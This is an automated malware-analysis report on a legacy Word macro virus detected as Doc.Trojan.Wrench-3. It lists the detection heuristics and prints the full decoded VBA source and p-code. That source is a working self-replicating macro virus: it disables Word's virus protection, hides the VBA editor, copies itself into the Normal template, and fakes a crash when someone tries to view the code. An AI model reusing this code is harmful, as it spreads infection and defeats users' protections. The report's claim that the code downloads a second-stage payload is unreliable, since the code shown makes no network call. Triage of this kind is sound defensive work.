Verdict: MALICIOUS
Risk Score: 376

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose functions, which are commonly used to execute malicious code upon opening or closing the document. The VBA code attempts to export and import components named 'Bench' and 'BenchFrm' to the C drive, suggesting an attempt to download and execute a second-stage payload. The presence of legacy macro virus markers and the ClamAV detection further support its malicious nature.
Heuristics (9)

- ClamAV: Doc.Trojan.Wrench-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Wrench-3
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Application.Options.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The OLE file is 38,312 bytes but its declared streams total only 0 bytes; 38,312 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS): This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7843 bytes |

SHA-256: 7684acad9bd9c3278247808c558fc973c1f870a6b9eb6c2ef82fba2c632cb394

Detection (ClamAV): Doc.Trojan.Wrench-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Bench"
Function Stealth()
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.ConfirmConversions = False
CommandBars("Visual Basic").Protection = msoBarNoCustomize
CommandBars("Visual Basic").Visible = False
CommandBars("Visual Basic").Enabled = False
End Function
Function BenchCore()
On Error Resume Next
If MacroContainer = NormalTemplate Then
Set Carrier = NormalTemplate.VBProject.VBComponents
Set host = ActiveDocument.VBProject.VBComponents
Else
Set Carrier = ActiveDocument.VBProject.VBComponents
Set host = NormalTemplate.VBProject.VBComponents
End If
For x = 1 To 2
If x = 1 Then MyMacroName = "Bench" Else MyMacroName = "BenchFrm"
If host(MyMacroName).Name <> MyMacroName Then
Carrier(MyMacroName).Export "c:\" & MyMacroName
host.Import "c:\" & MyMacroName
End If
Next x
Kill "c:\Bench*"
End Function
Sub ViewVBCode()
On Error Resume Next
ActiveDocument.Saved = True
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Application.Quit
End Sub
Sub AutoOpen()
On Error Resume Next
Call Stealth
Call BenchCore
End Sub
Sub AutoClose()
On Error Resume Next
Call BenchCore
If Left$(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.Saved = True Else ActiveDocument.Save
End Sub
Sub ToolsMacro()
End Sub
Sub HelpAbout()
BenchFrm.Show
End Sub
Sub FormatStyle()
End Sub
Sub FileClose()
Call BenchCore
End Sub
Sub FileNew()
Call BenchCore
Dialogs(wdDialogFileNew).Show
End Sub
Sub FileOpen()
Call BenchCore
Dialogs(wdDialogFileOpen).Show
End Sub
Sub Organizer()
ActiveDocument.Saved = True
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Application.Quit
End Sub
Attribute VB_Name = "BenchFrm"
Attribute VB_Base = "0{E1D47D84-DFCF-11D3-ACD9-900936D3B526}{E1D47D7E-DFCF-11D3-ACD9-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Unload Me
End Sub
Private Sub Image1_Click()
MsgBox "I'm Psycho Sushi!!!", vbInformation, "Sushi Power!"
End Sub
' Processing file: /tmp/qstore_76zvx2yl
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Bench - 4184 bytes
' Line #0:
' FuncDefn (Function Stealth())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitVarSpecial (False)
' Ld Application
' MemLd Options
' MemSt VirusProtection
' Line #3:
' LitVarSpecial (False)
' Ld Application
' MemLd Options
' MemSt ConfirmConversions
' Line #4:
' Ld msoBarNoCustomize
' LitStr 0x000C "Visual Basic"
' ArgsLd CommandBars 0x0001
' MemSt Protection
' Line #5:
' LitVarSpecial (False)
' LitStr 0x000C "Visual Basic"
' ArgsLd CommandBars 0x0001
' MemSt Visible
' Line #6:
' LitVarSpecial (False)
' LitStr 0x000C "Visual Basic"
' ArgsLd CommandBars 0x0001
' MemSt Enabled
' Line #7:
' EndFunc
' Line #8:
' FuncDefn (Function BenchCore())
' Line #9:
' OnError (Resume Next)
' Line #10:
' Ld MacroContainer
' Ld NormalTemplate
' Eq
' IfBlock
' Line #11:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set Carrier
' Line #12:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set host
' Line #13:
' ElseBlock
' Line #14:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set Carrier
' Line #15:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set host
' Line #16:
' EndIfBlock
' Line #17:
' Line #18:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0002
' For
' Line #19:
' Ld x
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0005 "Bench"
' St MyMacroName
' Else
' BoSImplicit
' LitStr 0x0008 "BenchFrm"
' St MyMacroName
' EndIf
' Line #20:
' Ld MyMacroName
' ArgsLd host 0x0001
' MemLd New
' Ld MyMacroName
' Ne
' IfBlock
' Line #21:
' LitStr 0x0003 "c:\"
' Ld MyMacroName
' Concat
' Ld MyMacroName
' ArgsLd Carrier 0x0001
' ArgsMemCall Export 0x0001
' Line #22:
' LitStr 0x0003 "c:\"
' Ld MyMacroName
' Concat
' Ld host
' ArgsMemCall Import 0x0001
' Line #23:
' EndIfBlock
' Line #24:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #25:
' Line #26:
' LitStr 0x0009 "c:\Bench*"
' ArgsCall Kill 0x0001
' Line #27:
' Line #28:
' EndFunc
' Line #29:
' FuncDefn (Sub ViewVBCode())
' Line #30:
' OnError (Resume Next)
' Line #31:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #32:
' LitStr 0x0043 "This program has performed an illegal operation and will shut down."
' Ld vbCritical
' LitStr 0x000E "Microsoft Word"
' ArgsCall MsgBox 0x0003
' Line #33:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #34:
' EndSub
' Line #35:
' FuncDefn (Sub AutoOpen())
' Line #36:
' OnError (Resume Next)
' Line #37:
' ArgsCall (Call) Stealth 0x0000
' Line #38:
' ArgsCall (Call) BenchCore 0x0000
' Line #39:
' EndSub
' Line #40:
' FuncDefn (Sub AutoClose())
' Line #41:
' OnError (Resume Next)
' Line #42:
' ArgsCall (Call) BenchCore 0x0000
' Line #43:
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound$ 0x0002
' LitStr 0x0008 "Document"
' Ne
' If
' BoSImplicit
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Else
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #44:
' EndSub
' Line #45:
' FuncDefn (Sub ToolsMacro())
' Line #46:
' EndSub
' Line #47:
' FuncDefn (Sub HelpAbout())
' Line #48:
' Ld BenchFrm
' ArgsMemCall Show 0x0000
' Line #49:
' EndSub
' Line #50:
' FuncDefn (Sub FormatStyle())
' Line #51:
' EndSub
' Line #52:
' FuncDefn (Sub FileClose())
' Line #53:
' ArgsCall (Call) BenchCore 0x0000
' Line #54:
' EndSub
' Line #55:
' FuncDefn (Sub FileNew())
' Line #56:
' ArgsCall (Call) BenchCore 0x0000
' Line #57:
' Ld wdDialogFileNew
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #58:
' EndSub
' Line #59:
' FuncDefn (Sub FileOpen())
' Line #60:
' ArgsCall (Call) BenchCore 0x0000
' Line #61:
' Ld wdDialogFileOpen
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #62:
' EndSub
' Line #63:
' FuncDefn (Sub Organizer())
' Line #64:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #65:
' LitStr 0x0043 "This program has performed an illegal operation and will shut down."
' Ld vbCritical
' LitStr 0x000E "Microsoft Word"
' ArgsCall MsgBox 0x0003
' Line #66:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #67:
' EndSub
' Macros/VBA/BenchFrm - 1808 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' FuncDefn (Private Sub CommandButton1_Click())
' Line #23:
' Ld id_FFFF
' ArgsCall Unlock 0x0001
' Line #24:
' EndSub
' Line #25:
' FuncDefn (Private Sub Image1_Click())
' Line #26:
' LitStr 0x0013 "I'm Psycho Sushi!!!"
' Ld vbInformation
' LitStr 0x000C "Sushi Power!"
' ArgsCall MsgBox 0x0003
' Line #27:
' EndSub
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_off00008a58.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x8A58 | 38312 bytes |

SHA-256: 0c3d117270f300665e7b29ea5f2b42ce807b7788071996cf4da71d755d21c933